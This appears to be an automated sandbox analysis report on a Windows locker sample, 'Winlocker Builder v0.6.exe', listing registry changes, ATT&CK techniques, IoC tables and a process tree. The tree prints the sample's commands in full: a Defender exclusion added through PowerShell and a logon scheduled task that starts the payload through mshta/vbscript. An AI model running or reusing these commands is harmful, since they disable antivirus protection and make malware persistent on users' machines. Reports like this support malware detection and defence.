Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-103#immutable1 = "Customize your keyboard settings, such as the cursor blink rate and the character repeat rate."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-4#immutable1 = "Device Manager"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15301#immutable1 = "Manage your RemoteApp and Desktop Connections"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Defender Firewall"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-2#immutable1 = "Change user account settings and passwords for people who share this computer."	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-1000#immutable1 = "Devices and Printers"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-3#immutable1 = "Region"	explorer.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3200	schtasks.exe
3452	schtasks.exe
1232	schtasks.exe
1604	schtasks.exe
244	schtasks.exe
3704	schtasks.exe
3428	schtasks.exe
4832	schtasks.exe
4088	schtasks.exe
2476	schtasks.exe
920	schtasks.exe
1980	schtasks.exe
3432	schtasks.exe
1400	schtasks.exe
3588	schtasks.exe
2392	schtasks.exe
556	schtasks.exe
4948	schtasks.exe
1120	schtasks.exe
3180	schtasks.exe
2784	schtasks.exe
1892	schtasks.exe
2836	schtasks.exe
3144	schtasks.exe
2588	schtasks.exe
2992	schtasks.exe
4828	schtasks.exe
5080	schtasks.exe
2072	schtasks.exe
4460	schtasks.exe
3752	schtasks.exe
2216	schtasks.exe
2800	schtasks.exe
2848	schtasks.exe
1108	schtasks.exe
3596	schtasks.exe
948	schtasks.exe
2288	schtasks.exe
1568	schtasks.exe
2936	schtasks.exe
3884	schtasks.exe
4860	schtasks.exe
2920	schtasks.exe
2868	schtasks.exe
3572	schtasks.exe
1836	schtasks.exe
1156	schtasks.exe
2848	schtasks.exe
4864	schtasks.exe
3560	schtasks.exe
1580	schtasks.exe
2756	schtasks.exe
1612	schtasks.exe
4556	schtasks.exe
2044	schtasks.exe
4108	schtasks.exe
3264	schtasks.exe
3572	schtasks.exe
2912	schtasks.exe
652	schtasks.exe
3056	schtasks.exe
1636	schtasks.exe
2700	schtasks.exe
4564	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2156	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1156	rundll32.exe
3116	powershell.exe
3116	powershell.exe
4980	rundll32.exe
1596	powershell.exe
1596	powershell.exe
2156	explorer.exe
3704	rundll32.exe
2864	powershell.exe
2864	powershell.exe
1704	powershell.exe
1704	powershell.exe
2932	powershell.exe
2932	powershell.exe
4108	rundll32.exe
3356	powershell.exe
3356	powershell.exe
2484	powershell.exe
2484	powershell.exe
3784	rundll32.exe
2652	powershell.exe
2652	powershell.exe
1164	rundll32.exe
2936	powershell.exe
2936	powershell.exe
4496	rundll32.exe
1140	powershell.exe
1140	powershell.exe
1388	rundll32.exe
1524	powershell.exe
1524	powershell.exe
2776	rundll32.exe
3488	powershell.exe
3488	powershell.exe
1764	rundll32.exe
4956	powershell.exe
4956	powershell.exe
3280	rundll32.exe
2296	powershell.exe
2296	powershell.exe
560	rundll32.exe
4228	powershell.exe
4228	powershell.exe
2860	rundll32.exe
228	powershell.exe
228	powershell.exe
2492	rundll32.exe
1292	powershell.exe
1292	powershell.exe
1840	rundll32.exe
2948	powershell.exe
2948	powershell.exe
2328	rundll32.exe
3852	powershell.exe
3852	powershell.exe
2544	rundll32.exe
1896	powershell.exe
1896	powershell.exe
4676	rundll32.exe
3888	powershell.exe
3888	powershell.exe
4700	rundll32.exe
3416	powershell.exe
3416	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4956	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	1156	rundll32.exe
Token: SeDebugPrivilege	3116	powershell.exe
Token: SeDebugPrivilege	1724	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	4980	rundll32.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeShutdownPrivilege	2156	explorer.exe
Token: SeCreatePagefilePrivilege	2156	explorer.exe
Token: SeDebugPrivilege	2156	explorer.exe
Token: SeDebugPrivilege	3288	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	3704	rundll32.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	3156	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	4108	rundll32.exe
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	2692	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	3784	rundll32.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2420	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	1164	rundll32.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	4712	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	4496	rundll32.exe
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeDebugPrivilege	2176	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	1388	rundll32.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	3400	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	2776	rundll32.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	3784	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	1764	rundll32.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	2736	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	3280	rundll32.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	4448	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	560	rundll32.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	556	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	2860	rundll32.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	3704	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	2492	rundll32.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	2816	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	1840	rundll32.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2428	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	2328	rundll32.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	1388	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	2544	rundll32.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	4956	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	4676	rundll32.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeDebugPrivilege	3428	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	4700	rundll32.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	908	Winlocker Builder v0.6.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2156	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4956 wrote to memory of 228	4956	Winlocker Builder v0.6.exe	78
PID 4956 wrote to memory of 228	4956	Winlocker Builder v0.6.exe	78
PID 4956 wrote to memory of 1724	4956	Winlocker Builder v0.6.exe	79
PID 4956 wrote to memory of 1724	4956	Winlocker Builder v0.6.exe	79
PID 228 wrote to memory of 1156	228	control.exe	80
PID 228 wrote to memory of 1156	228	control.exe	80
PID 1156 wrote to memory of 3116	1156	rundll32.exe	81
PID 1156 wrote to memory of 3116	1156	rundll32.exe	81
PID 1156 wrote to memory of 4108	1156	rundll32.exe	83
PID 1156 wrote to memory of 4108	1156	rundll32.exe	83
PID 1156 wrote to memory of 1508	1156	rundll32.exe	85
PID 1156 wrote to memory of 1508	1156	rundll32.exe	85
PID 1724 wrote to memory of 3384	1724	Winlocker Builder v0.6.exe	88
PID 1724 wrote to memory of 3384	1724	Winlocker Builder v0.6.exe	88
PID 1724 wrote to memory of 3288	1724	Winlocker Builder v0.6.exe	89
PID 1724 wrote to memory of 3288	1724	Winlocker Builder v0.6.exe	89
PID 3384 wrote to memory of 4980	3384	control.exe	90
PID 3384 wrote to memory of 4980	3384	control.exe	90
PID 4980 wrote to memory of 1596	4980	rundll32.exe	91
PID 4980 wrote to memory of 1596	4980	rundll32.exe	91
PID 4980 wrote to memory of 1636	4980	rundll32.exe	94
PID 4980 wrote to memory of 1636	4980	rundll32.exe	94
PID 4980 wrote to memory of 3568	4980	rundll32.exe	97
PID 4980 wrote to memory of 3568	4980	rundll32.exe	97
PID 3288 wrote to memory of 2480	3288	Winlocker Builder v0.6.exe	134
PID 3288 wrote to memory of 2480	3288	Winlocker Builder v0.6.exe	134
PID 3288 wrote to memory of 3156	3288	Winlocker Builder v0.6.exe	101
PID 3288 wrote to memory of 3156	3288	Winlocker Builder v0.6.exe	101
PID 2480 wrote to memory of 3704	2480	control.exe	102
PID 2480 wrote to memory of 3704	2480	control.exe	102
PID 3704 wrote to memory of 2864	3704	rundll32.exe	103
PID 3704 wrote to memory of 2864	3704	rundll32.exe	103
PID 3704 wrote to memory of 3572	3704	rundll32.exe	105
PID 3704 wrote to memory of 3572	3704	rundll32.exe	105
PID 2156 wrote to memory of 1704	2156	explorer.exe	107
PID 2156 wrote to memory of 1704	2156	explorer.exe	107
PID 2156 wrote to memory of 4104	2156	explorer.exe	109
PID 2156 wrote to memory of 4104	2156	explorer.exe	109
PID 2156 wrote to memory of 2932	2156	explorer.exe	111
PID 2156 wrote to memory of 2932	2156	explorer.exe	111
PID 3704 wrote to memory of 4288	3704	rundll32.exe	113
PID 3704 wrote to memory of 4288	3704	rundll32.exe	113
PID 3156 wrote to memory of 3108	3156	Winlocker Builder v0.6.exe	116
PID 3156 wrote to memory of 3108	3156	Winlocker Builder v0.6.exe	116
PID 3156 wrote to memory of 2692	3156	Winlocker Builder v0.6.exe	117
PID 3156 wrote to memory of 2692	3156	Winlocker Builder v0.6.exe	117
PID 3108 wrote to memory of 4108	3108	control.exe	118
PID 3108 wrote to memory of 4108	3108	control.exe	118
PID 2156 wrote to memory of 3356	2156	explorer.exe	119
PID 2156 wrote to memory of 3356	2156	explorer.exe	119
PID 4108 wrote to memory of 2484	4108	rundll32.exe	121
PID 4108 wrote to memory of 2484	4108	rundll32.exe	121
PID 4108 wrote to memory of 3180	4108	rundll32.exe	123
PID 4108 wrote to memory of 3180	4108	rundll32.exe	123
PID 2156 wrote to memory of 4828	2156	explorer.exe	125
PID 2156 wrote to memory of 4828	2156	explorer.exe	125
PID 4108 wrote to memory of 2088	4108	rundll32.exe	127
PID 4108 wrote to memory of 2088	4108	rundll32.exe	127
PID 2692 wrote to memory of 2844	2692	Winlocker Builder v0.6.exe	130
PID 2692 wrote to memory of 2844	2692	Winlocker Builder v0.6.exe	130
PID 2692 wrote to memory of 2420	2692	Winlocker Builder v0.6.exe	131
PID 2692 wrote to memory of 2420	2692	Winlocker Builder v0.6.exe	131
PID 2844 wrote to memory of 3784	2844	control.exe	132
PID 2844 wrote to memory of 3784	2844	control.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
"C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4956
- C:\Windows\System32\control.exe
  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3116
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4108
  - - C:\Windows\system32\SCHTASKS.exe
      SCHTASKS.exe /RUN /TN "WinLocker"
      4⤵
      PID:1508
- C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
  "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\System32\control.exe
    "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3384
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Loads dropped DLL
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1636
    - - C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        5⤵
        
        PID:3568
- - C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
    "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
    3⤵
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3288
  - - C:\Windows\System32\control.exe
      "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2480
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3704
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3572
      - C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        6⤵
        
        PID:4288
  - - C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
      "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3156
    - - C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3108
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        6⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3180
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        7⤵
        
        PID:2088
    - - C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        5⤵
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2692
      - C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2844
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        7⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:2480
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3588
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        8⤵
        
        PID:4692
      - C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        7⤵
        
        PID:4844
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        8⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:948
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        9⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4712
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        8⤵
        
        PID:2904
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        9⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2392
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        10⤵
        
        PID:3412
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2176
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        9⤵
        
        PID:3844
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        10⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4864
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        11⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3400
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        10⤵
        
        PID:1448
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        11⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
